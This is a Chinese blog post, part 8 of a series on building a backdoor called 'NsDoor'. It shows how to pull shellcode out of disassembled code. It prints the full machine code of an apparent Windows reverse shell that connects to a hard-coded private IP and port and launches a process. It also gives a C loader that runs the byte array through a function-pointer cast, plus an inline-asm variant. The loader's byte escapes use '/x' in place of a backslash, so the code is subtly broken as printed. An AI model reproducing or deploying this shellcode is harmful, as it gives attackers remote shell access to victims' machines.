循环渐进NsDoor(八)
前面汇编不是已经写好了嘛,怎么提取shellcode呢,网上有很多方法
懂得汇编的应该也能想到,最简单的应该是直接在内存中的code segment中复制下来,我使用了最麻烦的方法,自己反汇编的时候一点一点复制下来…
汗
前面汇编不是已经写好了嘛,怎么提取shellcode呢,网上有很多方法
懂得汇编的应该也能想到,最简单的应该是直接在内存中的code segment中复制下来,我使用了最麻烦的方法,自己反汇编的时候一点一点复制下来…
汗
同理,选择反汇编
把现实代码字节选上
Code bytes
看见没,机器码出来了,把它们复制在一起….
强大吧
B8 55 6A A2 71 89 45 04 B8 11 42 A2 71 89 45 08 B8 27 D8 81 7C 89 45 0C B8 6F 67 A2 71 89 45 10
B8 46 24 80 7C 89 45 14 B8 35 24 92 7C 89 45 18 B8 6B 23 80 7C 89 45 1C B8 07 4A A2 71 89 45 20
B8 27 4C A2 71 89 45 24 B8 12 18 80 7C 89 45 28 C6 45 38 00 C6 45 3C 00 C6 45 50 00 81 EC 90 01
00 00 54 68 02 02 00 00 FF 55 04 6A 06 6A 01 6A 02 FF 55 08 8B D8 68 C0 A8 06 14 B8 02 00 05 ED
50 8B F4 6A 10 56 53 FF 55 20 83 F8 FF 74 E7 6A 01 6A 00 6A 0C 8B C4 6A 00 50 8D 45 3C 50 8D 45
38 50 FF 55 0C 68 8C 0F 00 00 68 8C 0F 00 00 6A 00 6A 00 6A 00 68 01 01 00 00 6A 00 6A 00 6A 00
6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8B FC 6A 00 68 C8 00 00 00 8D 85 34 FB FF FF 50
53 FF 55 10 68 64 95 96 7C 68 44 D1 98 7C 6A FF 68 68 D1 98 7C 8B C4 50 57 6A 00 6A 00 6A 00 6A
01 6A 00 6A 00 8D 85 34 FB FF FF 50 6A 00 FF 55 1C 83 F8 00 74 CE 68 E8 03 00 00 FF 55 14 57 68
00 04 00 00 8D 85 35 FB FF FF 50 FF 75 38 FF 55 28 68 00 04 00 00 6A 00 8D 85 35 FB FF FF 50 FF
55 18 6A 64 FF 55 14 68 C8 00 00 00 6A 00 8D 85 34 FB FF FF 50 FF 55 18 E9 75 FF FF FF
大约331个字节好像
然后把它变成合适的十六进制表示,即加上/x
/xB8/x55/x6A/xA2/x71/x89/x45/x04/xB8/x11/x42/xA2/x71/x89/x45/x08/xB8/x27/xD8/x81/x7C/x89/x45/x0C/xB8/x6F/x67/xA2/x71/x89/x45/x10
/xB8/x46/x24/x80/x7C/x89/x45/x14/xB8/x35/x24/x92/x7C/x89/x45/x18/xB8/x6B/x23/x80/x7C/x89/x45/x1C/xB8/x07/x4A/xA2/x71/x89/x45/x20
/xB8/x27/x4C/xA2/x71/x89/x45/x24/xB8/x12/x18/x80/x7C/x89/x45/x28/xC6/x45/x38/x00/xC6/x45/x3C/x00/xC6/x45/x50/x00/x81/xEC/x90/x01
/x00/x00/x54/x68/x02/x02/x00/x00/xFF/x55/x04/x6A/x06/x6A/x01/x6A/x02/xFF/x55/x08/x8B/xD8/x68/xC0/xA8/x06/x14/xB8/x02/x00/x05/xED
/x50/x8B/xF4/x6A/x10/x56/x53/xFF/x55/x20/x83/xF8/xFF/x74/xE7/x6A/x01/x6A/x00/x6A/x0C/x8B/xC4/x6A/x00/x50/x8D/x45/x3C/x50/x8D/x45
/x38/x50/xFF/x55/x0C/x68/x8C/x0F/x00/x00/x68/x8C/x0F/x00/x00/x6A/x00/x6A/x00/x6A/x00/x68/x01/x01/x00/x00/x6A/x00/x6A/x00/x6A/x00
/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x8B/xFC/x6A/x00/x68/xC8/x00/x00/x00/x8D/x85/x34/xFB/xFF/xFF/x50
/x53/xFF/x55/x10/x68/x64/x95/x96/x7C/x68/x44/xD1/x98/x7C/x6A/xFF/x68/x68/xD1/x98/x7C/x8B/xC4/x50/x57/x6A/x00/x6A/x00/x6A/x00/x6A
/x01/x6A/x00/x6A/x00/x8D/x85/x34/xFB/xFF/xFF/x50/x6A/x00/xFF/x55/x1C/x83/xF8/x00/x74/xCE/x68/xE8/x03/x00/x00/xFF/x55/x14/x57/x68
/x00/x04/x00/x00/x8D/x85/x35/xFB/xFF/xFF/x50/xFF/x75/x38/xFF/x55/x28/x68/x00/x04/x00/x00/x6A/x00/x8D/x85/x35/xFB/xFF/xFF/x50/xFF
/x55/x18/x6A/x64/xFF/x55/x14/x68/xC8/x00/x00/x00/x6A/x00/x8D/x85/x34/xFB/xFF/xFF/x50/xFF/x55/x18/xE9/x75
现在shellcode得到了,剩下的怎么办呢,我们用测死shellcode的方法生产程序
#include<windows.h>
int main()
{
LoadLibraryA("Ws2_32");
unsigned char ShellCode[] = "/xB8/x55/x6A/xA2/x71/x89/x45/x04/xB8/x11/x42/xA2/x71/x89/x45/x08/xB8/x27/xD8/x81/x7C/x89/x45/x0C/xB8/x6F/x67/xA2/x71/x89/x45/x10/xB8/x46/x24/x80/x7C/x89/x45/x14/xB8/x35/x24/x92/x7C/x89/x45/x18/xB8/x6B/x23/x80/x7C/x89/x45/x1C/xB8/x07/x4A/xA2/x71/x89/x45/x20/xB8/x27/x4C/xA2/x71/x89/x45/x24/xB8/x12/x18/x80/x7C/x89/x45/x28/xC6/x45/x38/x00/xC6/x45/x3C/x00/xC6/x45/x50/x00/x81/xEC/x90/x01/x00/x00/x54/x68/x02/x02/x00/x00/xFF/x55/x04/x6A/x06/x6A/x01/x6A/x02/xFF/x55/x08/x8B/xD8/x68/xC0/xA8/x06/x14/xB8/x02/x00/x05/xED/x50/x8B/xF4/x6A/x10/x56/x53/xFF/x55/x20/x83/xF8/xFF/x74/xE7/x6A/x01/x6A/x00/x6A/x0C/x8B/xC4/x6A/x00/x50/x8D/x45/x3C/x50/x8D/x45/x38/x50/xFF/x55/x0C/x68/x8C/x0F/x00/x00/x68/x8C/x0F/x00/x00/x6A/x00/x6A/x00/x6A/x00/x68/x01/x01/x00/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x8B/xFC/x6A/x00/x68/xC8/x00/x00/x00/x8D/x85/x34/xFB/xFF/xFF/x50/x53/xFF/x55/x10/x68/x64/x95/x96/x7C/x68/x44/xD1/x98/x7C/x6A/xFF/x68/x68/xD1/x98/x7C/x8B/xC4/x50/x57/x6A/x00/x6A/x00/x6A/x00/x6A/x01/x6A/x00/x6A/x00/x8D/x85/x34/xFB/xFF/xFF/x50/x6A/x00/xFF/x55/x1C/x83/xF8/x00/x74/xCE/x68/xE8/x03/x00/x00/xFF/x55/x14/x57/x68/x00/x04/x00/x00/x8D/x85/x35/xFB/xFF/xFF/x50/xFF/x75/x38/xFF/x55/x28/x68/x00/x04/x00/x00/x6A/x00/x8D/x85/x35/xFB/xFF/xFF/x50/xFF/x55/x18/x6A/x64/xFF/x55/x14/x68/xC8/x00/x00/x00/x6A/x00/x8D/x85/x34/xFB/xFF/xFF/x50/xFF/x55/x18/xE9/x75/xFF/xFF/xFF";
( (void(*)(void)) &ShellCode )();
}
int main()
{
LoadLibraryA("Ws2_32");
unsigned char ShellCode[] = "/xB8/x55/x6A/xA2/x71/x89/x45/x04/xB8/x11/x42/xA2/x71/x89/x45/x08/xB8/x27/xD8/x81/x7C/x89/x45/x0C/xB8/x6F/x67/xA2/x71/x89/x45/x10/xB8/x46/x24/x80/x7C/x89/x45/x14/xB8/x35/x24/x92/x7C/x89/x45/x18/xB8/x6B/x23/x80/x7C/x89/x45/x1C/xB8/x07/x4A/xA2/x71/x89/x45/x20/xB8/x27/x4C/xA2/x71/x89/x45/x24/xB8/x12/x18/x80/x7C/x89/x45/x28/xC6/x45/x38/x00/xC6/x45/x3C/x00/xC6/x45/x50/x00/x81/xEC/x90/x01/x00/x00/x54/x68/x02/x02/x00/x00/xFF/x55/x04/x6A/x06/x6A/x01/x6A/x02/xFF/x55/x08/x8B/xD8/x68/xC0/xA8/x06/x14/xB8/x02/x00/x05/xED/x50/x8B/xF4/x6A/x10/x56/x53/xFF/x55/x20/x83/xF8/xFF/x74/xE7/x6A/x01/x6A/x00/x6A/x0C/x8B/xC4/x6A/x00/x50/x8D/x45/x3C/x50/x8D/x45/x38/x50/xFF/x55/x0C/x68/x8C/x0F/x00/x00/x68/x8C/x0F/x00/x00/x6A/x00/x6A/x00/x6A/x00/x68/x01/x01/x00/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x8B/xFC/x6A/x00/x68/xC8/x00/x00/x00/x8D/x85/x34/xFB/xFF/xFF/x50/x53/xFF/x55/x10/x68/x64/x95/x96/x7C/x68/x44/xD1/x98/x7C/x6A/xFF/x68/x68/xD1/x98/x7C/x8B/xC4/x50/x57/x6A/x00/x6A/x00/x6A/x00/x6A/x01/x6A/x00/x6A/x00/x8D/x85/x34/xFB/xFF/xFF/x50/x6A/x00/xFF/x55/x1C/x83/xF8/x00/x74/xCE/x68/xE8/x03/x00/x00/xFF/x55/x14/x57/x68/x00/x04/x00/x00/x8D/x85/x35/xFB/xFF/xFF/x50/xFF/x75/x38/xFF/x55/x28/x68/x00/x04/x00/x00/x6A/x00/x8D/x85/x35/xFB/xFF/xFF/x50/xFF/x55/x18/x6A/x64/xFF/x55/x14/x68/xC8/x00/x00/x00/x6A/x00/x8D/x85/x34/xFB/xFF/xFF/x50/xFF/x55/x18/xE9/x75/xFF/xFF/xFF";
( (void(*)(void)) &ShellCode )();
}
当然
LoadLibraryA("Ws2_32");,这句可以省略的
这种写法我一般把它叫做混乱代码写法….
( (void(*)(void)) &ShellCode )();
编程这么多年,不知道有几个人意识到这一点了?
它把ShellCode转换成一个参数为空、返回为空的函数指针,并调用它。执行那一句就相当于执行ShellCode数组里的那些数据。
函数指针可以这么用!!!而且可以用机器码当程序的code段,很好很强大,很好很配合(cnbeta中评论番茄花园作者语)
再说种正常点的:
__asm
{
lea eax, ShellCode
call eax
}
Lea的作用是去地址赋给寄存器
原理应该知道吧,和前面函数的一致….
测试报告:
提取完机器码然后编译可以 通过,测试发现可以连接上,但是很大几率返回不了数据,我测试了好几天也没有成功
算是勉强能用吧
服务端,shellcode
客户端程序:
完全可以连上…
----------------by NewSketcher
Time: 080822 21:40
